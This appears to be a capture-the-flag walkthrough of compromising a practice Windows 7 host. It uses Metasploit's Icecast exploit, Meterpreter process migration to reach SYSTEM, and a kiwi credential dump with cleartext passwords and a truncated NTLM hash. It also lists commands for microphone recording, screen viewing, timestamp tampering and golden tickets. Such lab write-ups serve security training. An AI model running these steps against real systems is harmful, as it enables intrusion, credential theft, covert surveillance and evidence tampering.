Reconnaissance:

    Port 3389 is open (RDP).
    Port 8000 is running Icecast.
    Hostname of the machine: DARK-PC.
    The Icecast vulnerability (CVE-2004-1561) has an impact score of 6.4.

Exploitation:

    I open the Metasploit console using the command: msfconsole.
    I search for Icecast-related exploits with: search icecast.
    I use the exploit: exploit/windows/http/icecast_header to exploit the vulnerability.
    I successfully gain a Meterpreter shell.
    Using the getuid command, I find that the Dark user is logged in.

System Information:

    Hostname: DARK-PC
    OS: Windows 7 (6.1 Build 7601, Service Pack 1)
    Architecture: x64
    System Language: en_US
    Domain: WORKGROUP
    Logged-On Users: 2
    Meterpreter Version: x86/windows

Additional Exploit:

    I found another exploit: exploit/windows/local/bypassuac_eventvwr.
    I gained the SeTakeOwnershipPrivilege using the getprivs command.
    I ran the ps command and found the spoolsv.exe process.
    I migrated to spoolsv.exe using the command: migrate -N spoolsv.exe.
    After migration, I ran getuid again and now I have SYSTEM-level privileges (NT AUTHORITY\SYSTEM).

Credential Dumping:

    I loaded the kiwi module, which is an updated version of Mimikatz.
    I ran the command creds_all to dump all the credentials stored on the system.

Credential Dumping Output:

    MSV Credentials:
        Username: Dark, Domain: Dark-PC, NTLM Hash: 7c4fe5eada682714a036e393783

    WDigest Credentials:
        Username: Dark, Domain: Dark-PC, Password: Password01!

    TSPKG Credentials:
        Username: Dark, Domain: Dark-PC, Password: Password01!

    Kerberos Credentials:
        Username: Dark, Domain: Dark-PC, Password: Password01!

Other Commands:

    hashdump: Dumps all password hashes stored on the system.
    screenshare: Allows us to view the remote user's desktop in real-time.
    record_mic: Records audio from a microphone attached to the system.
    timestomp: Allows modification of file timestamps to complicate forensic analysis.
    golden_ticket_create: Creates a golden Kerberos ticket for further access or persistence.


